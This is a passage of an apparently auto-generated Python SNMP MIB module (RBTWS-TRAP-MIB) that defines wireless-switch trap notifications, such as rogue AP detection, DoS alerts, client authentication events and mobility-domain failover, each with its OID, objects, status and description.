3, 6, 1, 4, 1, 52, 4, 15, 1, 5, 0, 26)).setObjects(("RBTWS-TRAP-MIB", "rbtwsRFDetectXmtrMacAddr"), ("RBTWS-TRAP-MIB", "rbtwsRFDetectListenerListInfo")) if mibBuilder.loadTexts: rbtwsRFDetectSpoofedSsidAPTrap.setStatus('obsolete') if mibBuilder.loadTexts: rbtwsRFDetectSpoofedSsidAPTrap.setDescription('This trap is sent when RF detection finds an AP using the SSID of the listener, and the AP is not in the mobility domain. rbtwsRFDetectXmtrMacAddr is the radio MAC address from the beacon. rbtwsRFDetectListenerListInfo is a display string of a list of listener information. Obsoleted by rbtwsRFDetectRogueDeviceTrap2 and rbtwsRFDetectSuspectDeviceTrap2. One of the two traps will be sent, depending on RF detection classification rules.') rbtwsRFDetectDoSTrap = NotificationType((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 5, 0, 27)).setObjects(("RBTWS-TRAP-MIB", "rbtwsRFDetectDoSType"), ("RBTWS-TRAP-MIB", "rbtwsRFDetectXmtrMacAddr"), ("RBTWS-TRAP-MIB", "rbtwsRFDetectListenerListInfo")) if mibBuilder.loadTexts: rbtwsRFDetectDoSTrap.setStatus('current') if mibBuilder.loadTexts: rbtwsRFDetectDoSTrap.setDescription('This trap is sent when RF detection finds a denial of service (DoS) occurring. rbtwsRFDetectDoSType specifies the type of DoS. rbtwsRFDetectXmtrMacAddr is the radio MAC address from the beacon. rbtwsRFDetectListenerListInfo is a display string of a list of listener information.') rbtwsRFDetectClientViaRogueWiredAPTrap = NotificationType((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 5, 0, 28)).setObjects(("RBTWS-TRAP-MIB", "rbtwsSourceWsIp"), ("RBTWS-TRAP-MIB", "rbtwsPortNum"), ("RBTWS-TRAP-MIB", "rbtwsClientVLANid"), ("RBTWS-TRAP-MIB", "rbtwsClientVLANtag"), ("RBTWS-TRAP-MIB", "rbtwsRFDetectXmtrMacAddr"), ("RBTWS-TRAP-MIB", "rbtwsRFDetectListenerListInfo")) if mibBuilder.loadTexts: rbtwsRFDetectClientViaRogueWiredAPTrap.setStatus('obsolete') if mibBuilder.loadTexts: rbtwsRFDetectClientViaRogueWiredAPTrap.setDescription("This trap is sent when a client is detected that connected via a rogue AP that is attached to a wired port. rbtwsSourceWsIp is the IP address of the AC (switch) with the wired port. rbtwsPortNum is the port on the AC. rbtwsClientVLANid is the VLAN ID of the client's traffic. rbtwsClientVLANtag is the VLAN tag of the client's traffic. rbtwsRFDetectXmtrMacAddr is the MAC address of the client. rbtwsRFDetectListenerListInfo is a display string of a list of listener information. Obsoleted by rbtwsRFDetectClientViaRogueWiredAPTrap3.") rbtwsRFDetectInterferingRogueAPTrap = NotificationType((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 5, 0, 29)).setObjects(("RBTWS-TRAP-MIB", "rbtwsRFDetectXmtrMacAddr"), ("RBTWS-TRAP-MIB", "rbtwsRFDetectListenerListInfo")) if mibBuilder.loadTexts: rbtwsRFDetectInterferingRogueAPTrap.setStatus('obsolete') if mibBuilder.loadTexts: rbtwsRFDetectInterferingRogueAPTrap.setDescription('This trap is sent when RF detection finds an interfering rogue AP. rbtwsRFDetectXmtrMacAddr is the radio MAC address from the beacon. rbtwsRFDetectListenerListInfo is a display string of a list of listener information. Obsoleted by rbtwsRFDetectSuspectDeviceTrap2.') rbtwsRFDetectInterferingRogueDisappearTrap = NotificationType((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 5, 0, 30)).setObjects(("RBTWS-TRAP-MIB", "rbtwsRFDetectXmtrMacAddr")) if mibBuilder.loadTexts: rbtwsRFDetectInterferingRogueDisappearTrap.setStatus('obsolete') if mibBuilder.loadTexts: rbtwsRFDetectInterferingRogueDisappearTrap.setDescription('This trap is sent when an interfering rogue has disappeared. rbtwsRFDetectXmtrMacAddr is the radio MAC address from the beacon. Obsoleted by rbtwsRFDetectSuspectDeviceDisappearTrap.') rbtwsRFDetectUnAuthorizedSsidTrap = NotificationType((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 5, 0, 31)).setObjects(("RBTWS-TRAP-MIB", "rbtwsRFDetectXmtrMacAddr"), ("RBTWS-TRAP-MIB", "rbtwsRFDetectListenerListInfo")) if mibBuilder.loadTexts: rbtwsRFDetectUnAuthorizedSsidTrap.setStatus('obsolete') if mibBuilder.loadTexts: rbtwsRFDetectUnAuthorizedSsidTrap.setDescription('This trap is sent when RF detection finds use of an unauthorized SSID. rbtwsRFDetectXmtrMacAddr is the radio MAC address from the beacon. rbtwsRFDetectListenerListInfo is a display string of a list of listener information. Obsoleted by rbtwsRFDetectRogueDeviceTrap2 and rbtwsRFDetectSuspectDeviceTrap2. One of the two traps will be sent if the device having an unauthorized SSID is classified as rogue or suspect because of this.') rbtwsRFDetectUnAuthorizedOuiTrap = NotificationType((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 5, 0, 32)).setObjects(("RBTWS-TRAP-MIB", "rbtwsRFDetectXmtrMacAddr"), ("RBTWS-TRAP-MIB", "rbtwsRFDetectListenerListInfo")) if mibBuilder.loadTexts: rbtwsRFDetectUnAuthorizedOuiTrap.setStatus('obsolete') if mibBuilder.loadTexts: rbtwsRFDetectUnAuthorizedOuiTrap.setDescription('This trap is sent when RF detection finds use of an unauthorized OUI. rbtwsRFDetectXmtrMacAddr is the radio MAC address from the beacon. rbtwsRFDetectListenerListInfo is a display string of a list of listener information. Obsoleted by rbtwsRFDetectRogueDeviceTrap2 and rbtwsRFDetectSuspectDeviceTrap2. One of the two traps will be sent if the device having an unauthorized OUI is classified as rogue or suspect because of this.') rbtwsRFDetectUnAuthorizedAPTrap = NotificationType((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 5, 0, 33)).setObjects(("RBTWS-TRAP-MIB", "rbtwsRFDetectXmtrMacAddr"), ("RBTWS-TRAP-MIB", "rbtwsRFDetectListenerListInfo")) if mibBuilder.loadTexts: rbtwsRFDetectUnAuthorizedAPTrap.setStatus('obsolete') if mibBuilder.loadTexts: rbtwsRFDetectUnAuthorizedAPTrap.setDescription('This trap is sent when RF detection finds operation of an unauthorized AP. rbtwsRFDetectXmtrMacAddr is the radio MAC address from the beacon. rbtwsRFDetectListenerListInfo is a display string of a list of listener information. Obsoleted by rbtwsRFDetectRogueDeviceTrap2.') rbtwsDAPConnectWarningTrap = NotificationType((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 5, 0, 34)).setObjects(("RBTWS-TRAP-MIB", "rbtwsDeviceModel"), ("RBTWS-TRAP-MIB", "rbtwsDeviceSerNum"), ("RBTWS-TRAP-MIB", "rbtwsRsaPubKeyFingerPrint"), ("RBTWS-TRAP-MIB", "rbtwsDAPconnectWarningType")) if mibBuilder.loadTexts: rbtwsDAPConnectWarningTrap.setStatus('obsolete') if mibBuilder.loadTexts: rbtwsDAPConnectWarningTrap.setDescription("A DAP, tried to connect to the AC. rbtwsDeviceModel provides the model of the DAP. rbtwsDeviceSerNum provides the serial number of the DAP. rbtwsRsaPubKeyFingerPrint provides the computed fingerprint of the DAP. rbtwsDAPconnectWarningType provides the type of connect warning. Replaced by rbtwsApNonOperStatusTrap2, with rbtwsApTransition = 'connectFail'.") rbtwsRFDetectDoSPortTrap = NotificationType((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 5, 0, 35)).setObjects(("RBTWS-TRAP-MIB", "rbtwsRFDetectDoSType"), ("RBTWS-TRAP-MIB", "rbtwsRFDetectXmtrMacAddr"), ("RBTWS-TRAP-MIB", "rbtwsClientAccessType"), ("RBTWS-TRAP-MIB", "rbtwsPortNum"), ("RBTWS-TRAP-MIB", "rbtwsDAPNum")) if mibBuilder.loadTexts: rbtwsRFDetectDoSPortTrap.setStatus('current') if mibBuilder.loadTexts: rbtwsRFDetectDoSPortTrap.setDescription("This trap is sent when RF detection finds a denial of service (DoS) occurring. This has port and AP info instead of 'Listener info'. rbtwsRFDetectDoSType specifies the type of DoS. rbtwsRFDetectXmtrMacAddr is the radio MAC address from the beacon. rbtwsClientAccessType specifies whether wired, AP, or DAP. rbtwsPortNum (for wired or AP), the port that is used. rbtwsDAPNum (for a DAP), the ID of the DAP.") rbtwsMpMichaelMICFailure2 = NotificationType((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 5, 0, 36)).setObjects(("RBTWS-TRAP-MIB", "rbtwsPortNum"), ("RBTWS-TRAP-MIB", "rbtwsAPRadioNum"), ("RBTWS-TRAP-MIB", "rbtwsClientMACAddress"), ("RBTWS-TRAP-MIB", "rbtwsClientMACAddress2")) if mibBuilder.loadTexts: rbtwsMpMichaelMICFailure2.setStatus('obsolete') if mibBuilder.loadTexts: rbtwsMpMichaelMICFailure2.setDescription('Two Michael MIC failures were seen within 60 seconds of each other. Object rbtwsClientMACAddress is the source of the first failure, and object rbtwsClientMACAddress2 source of the second failure. Obsoleted by rbtwsMichaelMICFailure.') rbtwsApNonOperStatusTrap = NotificationType((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 5, 0, 37)).setObjects(("RBTWS-TRAP-MIB", "rbtwsDeviceSerNum"), ("RBTWS-TRAP-MIB", "rbtwsAPMACAddress"), ("RBTWS-TRAP-MIB", "rbtwsApAttachType"), ("RBTWS-TRAP-MIB", "rbtwsApPortOrDapNum"), ("RBTWS-TRAP-MIB", "rbtwsApName"), ("RBTWS-TRAP-MIB", "rbtwsApTransition"), ("RBTWS-TRAP-MIB", "rbtwsApFailDetail"), ("RBTWS-TRAP-MIB", "rbtwsApWasOperational")) if mibBuilder.loadTexts: rbtwsApNonOperStatusTrap.setStatus('obsolete') if mibBuilder.loadTexts: rbtwsApNonOperStatusTrap.setDescription('This trap is sent when the AP changes state and the new one is a non-operational state. Obsoleted by rbtwsApNonOperStatusTrap2.') rbtwsApOperRadioStatusTrap = NotificationType((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 5, 0, 38)).setObjects(("RBTWS-TRAP-MIB", "rbtwsDeviceSerNum"), ("RBTWS-TRAP-MIB", "rbtwsApAttachType"), ("RBTWS-TRAP-MIB", "rbtwsApPortOrDapNum"), ("RBTWS-TRAP-MIB", "rbtwsApName"), ("RBTWS-TRAP-MIB", "rbtwsAPRadioNum"), ("RBTWS-TRAP-MIB", "rbtwsRadioMACAddress"), ("RBTWS-TRAP-MIB", "rbtwsRadioType"), ("RBTWS-TRAP-MIB", "rbtwsRadioConfigState"), ("RBTWS-TRAP-MIB", "rbtwsApConnectSecurityType"), ("RBTWS-TRAP-MIB", "rbtwsApServiceAvailability")) if mibBuilder.loadTexts: rbtwsApOperRadioStatusTrap.setStatus('obsolete') if mibBuilder.loadTexts: rbtwsApOperRadioStatusTrap.setDescription('This trap is sent when the Radio changes state. It also contains aggregate information about the AP in operational state - security level and service availability. Obsoleted by rbtwsApOperRadioStatusTrap3.') rbtwsClientIpAddrChangeTrap = NotificationType((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 5, 0, 39)).setObjects(("RBTWS-TRAP-MIB", "rbtwsUserName"), ("RBTWS-TRAP-MIB", "rbtwsClientSessionId"), ("RBTWS-TRAP-MIB", "rbtwsClientMACAddress"), ("RBTWS-TRAP-MIB", "rbtwsClientIp"), ("RBTWS-TRAP-MIB", "rbtwsClientVLANName"), ("RBTWS-TRAP-MIB", "rbtwsClientSessionState"), ("RBTWS-TRAP-MIB", "rbtwsClientAuthServerIp"), ("RBTWS-TRAP-MIB", "rbtwsClientAuthenProtocolType"), ("RBTWS-TRAP-MIB", "rbtwsClientAccessType"), ("RBTWS-TRAP-MIB", "rbtwsPortNum"), ("RBTWS-TRAP-MIB", "rbtwsAPRadioNum"), ("RBTWS-TRAP-MIB", "rbtwsDAPNum"), ("RBTWS-TRAP-MIB", "rbtwsRadioSSID"), ("RBTWS-TRAP-MIB", "rbtwsUserAccessType"), ("RBTWS-TRAP-MIB", "rbtwsLocalId"), ("RBTWS-TRAP-MIB", "rbtwsClientIpAddrChangeReason")) if mibBuilder.loadTexts: rbtwsClientIpAddrChangeTrap.setStatus('current') if mibBuilder.loadTexts: rbtwsClientIpAddrChangeTrap.setDescription("This trap is sent when a client's IP address changes. The most likely case for this is when the client first connects to the network.") rbtwsClientAssociationSuccessTrap = NotificationType((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 5, 0, 40)).setObjects(("RBTWS-TRAP-MIB", "rbtwsClientMACAddress"), ("RBTWS-TRAP-MIB", "rbtwsClientAccessType"), ("RBTWS-TRAP-MIB", "rbtwsPortNum"), ("RBTWS-TRAP-MIB", "rbtwsAPRadioNum"), ("RBTWS-TRAP-MIB", "rbtwsDAPNum"), ("RBTWS-TRAP-MIB", "rbtwsRadioSSID")) if mibBuilder.loadTexts: rbtwsClientAssociationSuccessTrap.setStatus('current') if mibBuilder.loadTexts: rbtwsClientAssociationSuccessTrap.setDescription('This trap is sent if a client association succeeds. WARNING: DO NOT enable it in normal use. It may impair switch performance! Only recommended for debugging network issues.') rbtwsClientAuthenticationSuccessTrap = NotificationType((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 5, 0, 41)).setObjects(("RBTWS-TRAP-MIB", "rbtwsClientMACAddress"), ("RBTWS-TRAP-MIB", "rbtwsClientAccessType"), ("RBTWS-TRAP-MIB", "rbtwsPortNum"), ("RBTWS-TRAP-MIB", "rbtwsAPRadioNum"), ("RBTWS-TRAP-MIB", "rbtwsDAPNum"), ("RBTWS-TRAP-MIB", "rbtwsRadioSSID")) if mibBuilder.loadTexts: rbtwsClientAuthenticationSuccessTrap.setStatus('current') if mibBuilder.loadTexts: rbtwsClientAuthenticationSuccessTrap.setDescription('This trap is sent if a client authentication succeeds.') rbtwsClientDeAuthenticationTrap = NotificationType((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 5, 0, 42)).setObjects(("RBTWS-TRAP-MIB", "rbtwsUserName"), ("RBTWS-TRAP-MIB", "rbtwsClientSessionId"), ("RBTWS-TRAP-MIB", "rbtwsClientMACAddress"), ("RBTWS-TRAP-MIB", "rbtwsClientIp"), ("RBTWS-TRAP-MIB", "rbtwsClientVLANName"), ("RBTWS-TRAP-MIB", "rbtwsClientAuthServerIp"), ("RBTWS-TRAP-MIB", "rbtwsClientAuthenProtocolType"), ("RBTWS-TRAP-MIB", "rbtwsClientAccessType"), ("RBTWS-TRAP-MIB", "rbtwsPortNum"), ("RBTWS-TRAP-MIB", "rbtwsAPRadioNum"), ("RBTWS-TRAP-MIB", "rbtwsDAPNum"), ("RBTWS-TRAP-MIB", "rbtwsRadioSSID")) if mibBuilder.loadTexts: rbtwsClientDeAuthenticationTrap.setStatus('current') if mibBuilder.loadTexts: rbtwsClientDeAuthenticationTrap.setDescription('This trap is sent if a client de-authentication occured.') rbtwsRFDetectBlacklistedTrap = NotificationType((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 5, 0, 43)).setObjects(("RBTWS-TRAP-MIB", "rbtwsRFDetectXmtrMacAddr"), ("RBTWS-TRAP-MIB", "rbtwsClientAccessType"), ("RBTWS-TRAP-MIB", "rbtwsPortNum"), ("RBTWS-TRAP-MIB", "rbtwsDAPNum"), ("RBTWS-TRAP-MIB", "rbtwsBlacklistingRemainingTime"), ("RBTWS-TRAP-MIB", "rbtwsBlacklistingCause")) if mibBuilder.loadTexts: rbtwsRFDetectBlacklistedTrap.setStatus('current') if mibBuilder.loadTexts: rbtwsRFDetectBlacklistedTrap.setDescription("This trap is sent if an association, re-association or de-association request (packet) is detected from a blacklisted transmitter (identified by MAC: 'rbtwsRFDetectXmtrMacAddr'). If 'rbtwsBlacklistingCause' is 'configured', then 'rbtwsBlacklistingRemainingTime' will be zero, meaning indefinite time (depending on administrative actions on the Black List). Otherwise, 'rbtwsBlacklistingRemainingTime' will indicate the time in seconds until this transmitter's requests could be allowed.") rbtwsRFDetectClientViaRogueWiredAPTrap2 = NotificationType((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 5, 0, 44)).setObjects(("RBTWS-TRAP-MIB", "rbtwsSourceWsIp"), ("RBTWS-TRAP-MIB", "rbtwsPortNum"), ("RBTWS-TRAP-MIB", "rbtwsClientVLANid"), ("RBTWS-TRAP-MIB", "rbtwsClientVLANtag"), ("RBTWS-TRAP-MIB", "rbtwsRFDetectXmtrMacAddr"), ("RBTWS-TRAP-MIB", "rbtwsRFDetectListenerListInfo"), ("RBTWS-TRAP-MIB", "rbtwsRFDetectRogueAPMacAddr")) if mibBuilder.loadTexts: rbtwsRFDetectClientViaRogueWiredAPTrap2.setStatus('obsolete') if mibBuilder.loadTexts: rbtwsRFDetectClientViaRogueWiredAPTrap2.setDescription("This trap is sent when a client is detected that connected via a rogue AP that is attached to a wired port. rbtwsSourceWsIp is the IP address of the AC (switch) with the wired port. rbtwsPortNum is the port on the AC. rbtwsClientVLANid is the VLAN ID of the client's traffic. rbtwsClientVLANtag is the VLAN tag of the client's traffic. rbtwsRFDetectXmtrMacAddr is the MAC address of the client. rbtwsRFDetectListenerListInfo is a display string of a list of listener information. rbtwsRFDetectRogueAPMacAddr is the MAC address of the Rogue AP (wired) the client is connected to. Obsoleted by rbtwsRFDetectClientViaRogueWiredAPTrap3.") rbtwsRFDetectAdhocUserDisappearTrap = NotificationType((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 5, 0, 45)).setObjects(("RBTWS-TRAP-MIB", "rbtwsRFDetectXmtrMacAddr")) if mibBuilder.loadTexts: rbtwsRFDetectAdhocUserDisappearTrap.setStatus('current') if mibBuilder.loadTexts: rbtwsRFDetectAdhocUserDisappearTrap.setDescription('This trap is sent when RF detection sweep finds that an ad-hoc user disappeared. rbtwsRFDetectXmtrMacAddr is the MAC address of the ad-hoc user.') rbtwsApRejectLicenseExceededTrap = NotificationType((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 5, 0, 46)).setObjects(("RBTWS-TRAP-MIB", "rbtwsNumLicensedActiveAPs")) if mibBuilder.loadTexts: rbtwsApRejectLicenseExceededTrap.setStatus('current') if mibBuilder.loadTexts: rbtwsApRejectLicenseExceededTrap.setDescription('This trap is sent when an AC (wireless switch) receives a packet from an inactive AP and attaching that AP would make the AC exceed the maximum (licensed) number of active APs.') rbtwsClientDynAuthorChangeSuccessTrap = NotificationType((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 5, 0, 47)).setObjects(("RBTWS-TRAP-MIB", "rbtwsUserName"), ("RBTWS-TRAP-MIB", "rbtwsClientSessionId"), ("RBTWS-TRAP-MIB", "rbtwsClientMACAddress"), ("RBTWS-TRAP-MIB", "rbtwsClientIp"), ("RBTWS-TRAP-MIB", "rbtwsClientSessionState"), ("RBTWS-TRAP-MIB", "rbtwsClientDynAuthorClientIp"), ("RBTWS-TRAP-MIB", "rbtwsClientAuthenProtocolType"), ("RBTWS-TRAP-MIB", "rbtwsClientAccessType"), ("RBTWS-TRAP-MIB", "rbtwsPortNum"), ("RBTWS-TRAP-MIB", "rbtwsAPRadioNum"), ("RBTWS-TRAP-MIB", "rbtwsDAPNum"), ("RBTWS-TRAP-MIB", "rbtwsRadioSSID"), ("RBTWS-TRAP-MIB", "rbtwsUserAccessType"), ("RBTWS-TRAP-MIB", "rbtwsLocalId"), ("RBTWS-TRAP-MIB", "rbtwsChangedUserParamOldValues"), ("RBTWS-TRAP-MIB", "rbtwsChangedUserParamNewValues")) if mibBuilder.loadTexts: rbtwsClientDynAuthorChangeSuccessTrap.setStatus('current') if mibBuilder.loadTexts: rbtwsClientDynAuthorChangeSuccessTrap.setDescription('This trap is sent when the authorization attributes for a user are dynamically changed by an authorized dynamic authorization client.') rbtwsClientDynAuthorChangeFailureTrap = NotificationType((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 5, 0, 48)).setObjects(("RBTWS-TRAP-MIB", "rbtwsUserName"), ("RBTWS-TRAP-MIB", "rbtwsClientSessionId"), ("RBTWS-TRAP-MIB", "rbtwsClientMACAddress"), ("RBTWS-TRAP-MIB", "rbtwsClientDynAuthorClientIp"), ("RBTWS-TRAP-MIB", "rbtwsClientAuthenProtocolType"), ("RBTWS-TRAP-MIB", "rbtwsClientAccessType"), ("RBTWS-TRAP-MIB", "rbtwsPortNum"), ("RBTWS-TRAP-MIB", "rbtwsAPRadioNum"), ("RBTWS-TRAP-MIB", "rbtwsDAPNum"), ("RBTWS-TRAP-MIB", "rbtwsRadioSSID"), ("RBTWS-TRAP-MIB", "rbtwsUserParams"), ("RBTWS-TRAP-MIB", "rbtwsClientAuthorizationFailureCause"), ("RBTWS-TRAP-MIB", "rbtwsClientFailureCauseDescription")) if mibBuilder.loadTexts: rbtwsClientDynAuthorChangeFailureTrap.setStatus('current') if mibBuilder.loadTexts: rbtwsClientDynAuthorChangeFailureTrap.setDescription('This trap is sent if a change of authorization request sent by an authorized dynamic authorization client is unsuccessful.') rbtwsClientDisconnectTrap = NotificationType((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 5, 0, 49)).setObjects(("RBTWS-TRAP-MIB", "rbtwsUserName"), ("RBTWS-TRAP-MIB", "rbtwsClientSessionId"), ("RBTWS-TRAP-MIB", "rbtwsClientMACAddress"), ("RBTWS-TRAP-MIB", "rbtwsClientIp"), ("RBTWS-TRAP-MIB", "rbtwsClientAccessType"), ("RBTWS-TRAP-MIB", "rbtwsPortNum"), ("RBTWS-TRAP-MIB", "rbtwsAPRadioNum"), ("RBTWS-TRAP-MIB", "rbtwsDAPNum"), ("RBTWS-TRAP-MIB", "rbtwsRadioSSID"), ("RBTWS-TRAP-MIB", "rbtwsLocalId"), ("RBTWS-TRAP-MIB", "rbtwsClientDisconnectSource"), ("RBTWS-TRAP-MIB", "rbtwsClientDisconnectDescription")) if mibBuilder.loadTexts: rbtwsClientDisconnectTrap.setStatus('current') if mibBuilder.loadTexts: rbtwsClientDisconnectTrap.setDescription('This trap is sent when a client session is terminated administratively.') rbtwsMobilityDomainFailOverTrap = NotificationType((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 5, 0, 50)).setObjects(("RBTWS-TRAP-MIB", "rbtwsMobilityDomainSecondarySeedIp")) if mibBuilder.loadTexts: rbtwsMobilityDomainFailOverTrap.setStatus('current') if mibBuilder.loadTexts: rbtwsMobilityDomainFailOverTrap.setDescription('This trap is sent when the Mobility Domain fails over to the secondary seed.') rbtwsMobilityDomainFailBackTrap = NotificationType((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 5, 0, 51)).setObjects(("RBTWS-TRAP-MIB", "rbtwsMobilityDomainPrimarySeedIp")) if mibBuilder.loadTexts: rbtwsMobilityDomainFailBackTrap.setStatus('current') if mibBuilder.loadTexts: rbtwsMobilityDomainFailBackTrap.setDescription('This trap is sent when the Mobility Domain fails back to the primary seed.') rbtwsRFDetectRogueDeviceTrap = NotificationType((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 5, 0, 52)).setObjects(("RBTWS-TRAP-MIB", "rbtwsRFDetectXmtrMacAddr"), ("RBTWS-TRAP-MIB", "rbtwsRFDetectListenerListInfo"), ("RBTWS-TRAP-MIB", "rbtwsRFDetectClassificationReason")) if mibBuilder.loadTexts: rbtwsRFDetectRogueDeviceTrap.setStatus('obsolete') if mibBuilder.loadTexts: rbtwsRFDetectRogueDeviceTrap.setDescription('This trap is sent when RF detection finds a rogue device. XmtrMacAddr is the radio MAC address from the beacon. ListenerListInfo is a display string of a list of listener information. ClassificationReason indicates the reason why the device is classified as rogue. Obsoleted by rbtwsRFDetectRogueDeviceTrap2.') rbtwsRFDetectRogueDeviceDisappearTrap = NotificationType((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 5, 0, 53)).setObjects(("RBTWS-TRAP-MIB", "rbtwsRFDetectXmtrMacAddr")) if mibBuilder.loadTexts: rbtwsRFDetectRogueDeviceDisappearTrap.setStatus('current') if mibBuilder.loadTexts: rbtwsRFDetectRogueDeviceDisappearTrap.setDescription('This trap is sent when a rogue device has disappeared. This trap obsoletes the rbtwsRFDetectRogueDisappearTrap.') rbtwsRFDetectSuspectDeviceTrap = NotificationType((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 5, 0, 54)).setObjects(("RBTWS-TRAP-MIB", "rbtwsRFDetectXmtrMacAddr"), ("RBTWS-TRAP-MIB", "rbtwsRFDetectListenerListInfo"), ("RBTWS-TRAP-MIB", "rbtwsRFDetectClassificationReason")) if mibBuilder.loadTexts: rbtwsRFDetectSuspectDeviceTrap.setStatus('obsolete') if mibBuilder.loadTexts: rbtwsRFDetectSuspectDeviceTrap.setDescription('This trap is sent when RF detection finds a suspect device. rbtwsRFDetectXmtrMacAddr is the radio MAC address from the beacon. rbtwsRFDetectListenerListInfo is a display string of a list of listener information. ClassificationReason indicates the reason why the device is classified as suspect. Obsoleted by rbtwsRFDetectSuspectDeviceTrap2.') rbtwsRFDetectSuspectDeviceDisappearTrap = NotificationType((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 5, 0, 55)).setObjects(("RBTWS-TRAP-MIB", "rbtwsRFDetectXmtrMacAddr")) if mibBuilder.loadTexts: rbtwsRFDetectSuspectDeviceDisappearTrap.setStatus('current') if mibBuilder.loadTexts: rbtwsRFDetectSuspectDeviceDisappearTrap.setDescription('This trap is sent when a suspect device has disappeared. rbtwsRFDetectXmtrMacAddr is the radio MAC address from the beacon. This trap obsoletes the rbtwsRFDetectInterferingRogueDisappearTrap.') rbtwsRFDetectClientViaRogueWiredAPTrap3 = NotificationType((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 5, 0, 56)).setObjects(("RBTWS-TRAP-MIB", "rbtwsSourceWsIp"), ("RBTWS-TRAP-MIB", "rbtwsPortNum"), ("RBTWS-TRAP-MIB", "rbtwsClientVLANid"), ("RBTWS-TRAP-MIB", "rbtwsClientVLANtag"), ("RBTWS-TRAP-MIB", "rbtwsRFDetectXmtrMacAddr"), ("RBTWS-TRAP-MIB", "rbtwsRFDetectListenerListInfo"), ("RBTWS-TRAP-MIB", "rbtwsRFDetectRogueAPMacAddr"), ("RBTWS-TRAP-MIB", "rbtwsRFDetectClassificationReason")) if mibBuilder.loadTexts: rbtwsRFDetectClientViaRogueWiredAPTrap3.setStatus('current') if mibBuilder.loadTexts: rbtwsRFDetectClientViaRogueWiredAPTrap3.setDescription("This trap is sent when a client is detected that connected via a rogue AP that is attached to a wired port. rbtwsSourceWsIp is the IP address of the AC (switch) with the wired port. rbtwsPortNum is the port on the AC. rbtwsClientVLANid is the VLAN ID of the client's traffic. rbtwsClientVLANtag is the VLAN tag of the client's traffic. rbtwsRFDetectXmtrMacAddr is the MAC address of the client. rbtwsRFDetectListenerListInfo is a display string of a list of listener information. rbtwsRFDetectRogueAPMacAddr is the MAC address of the Rogue AP (wired) the client is connected to. ClassificationReason indicates the reason why the AP is classified as rogue. This trap obsoletes the rbtwsRFDetectClientViaRogueWiredAPTrap and rbtwsRFDetectClientViaRogueWiredAPTrap2.") rbtwsRFDetectClassificationChangeTrap = NotificationType((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 5, 0, 57)) if mibBuilder.loadTexts: rbtwsRFDetectClassificationChangeTrap.setStatus('current') if mibBuilder.loadTexts: rbtwsRFDetectClassificationChangeTrap.setDescription('This trap is sent when RF detection classification rules change.') rbtwsConfigurationSavedTrap = NotificationType((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 5, 0, 58)).setObjects(("RBTWS-TRAP-MIB", "rbtwsConfigSaveFileName"), ("RBTWS-TRAP-MIB", "rbtwsConfigSaveInitiatorType"), ("RBTWS-TRAP-MIB", "rbtwsConfigSaveInitiatorIp"), ("RBTWS-TRAP-MIB", "rbtwsConfigSaveInitiatorDetails"), ("RBTWS-TRAP-MIB", "rbtwsConfigSaveGeneration")) if mibBuilder.loadTexts: rbtwsConfigurationSavedTrap.setStatus('current') if mibBuilder.loadTexts: rbtwsConfigurationSavedTrap.setDescription('This trap is sent when the running configuration of the switch is written to a configuration file.') rbtwsApNonOperStatusTrap2 = NotificationType((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 5, 0, 59)).setObjects(("RBTWS-TRAP-MIB", "rbtwsDeviceSerNum"), ("RBTWS-TRAP-MIB", "rbtwsAPMACAddress"), ("RBTWS-TRAP-MIB", "rbtwsApNum"), ("RBTWS-TRAP-MIB", "rbtwsApName"), ("RBTWS-TRAP-MIB", "rbtwsApTransition"), ("RBTWS-TRAP-MIB", "rbtwsApFailDetail"), ("RBTWS-TRAP-MIB", "rbtwsApWasOperational")) if mibBuilder.loadTexts: rbtwsApNonOperStatusTrap2.setStatus('current') if mibBuilder.loadTexts: rbtwsApNonOperStatusTrap2.setDescription('This trap is sent when the AP changes state and the new one is a non-operational state. Obsoletes rbtwsApNonOperStatusTrap.') rbtwsApOperRadioStatusTrap2 = NotificationType((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 5, 0, 60)).setObjects(("RBTWS-TRAP-MIB", "rbtwsDeviceSerNum"), ("RBTWS-TRAP-MIB", "rbtwsApNum"), ("RBTWS-TRAP-MIB", "rbtwsApName"), ("RBTWS-TRAP-MIB", "rbtwsAPRadioNum"), ("RBTWS-TRAP-MIB", "rbtwsRadioMACAddress"), ("RBTWS-TRAP-MIB", "rbtwsRadioType"), ("RBTWS-TRAP-MIB", "rbtwsRadioMode"), ("RBTWS-TRAP-MIB", "rbtwsRadioConfigState"), ("RBTWS-TRAP-MIB", "rbtwsApConnectSecurityType"), ("RBTWS-TRAP-MIB", "rbtwsApServiceAvailability")) if mibBuilder.loadTexts: rbtwsApOperRadioStatusTrap2.setStatus('obsolete') if mibBuilder.loadTexts: rbtwsApOperRadioStatusTrap2.setDescription('This trap is sent when the Radio changes state. It also contains aggregate information about the AP in operational state - security level and service availability. Obsoleted by 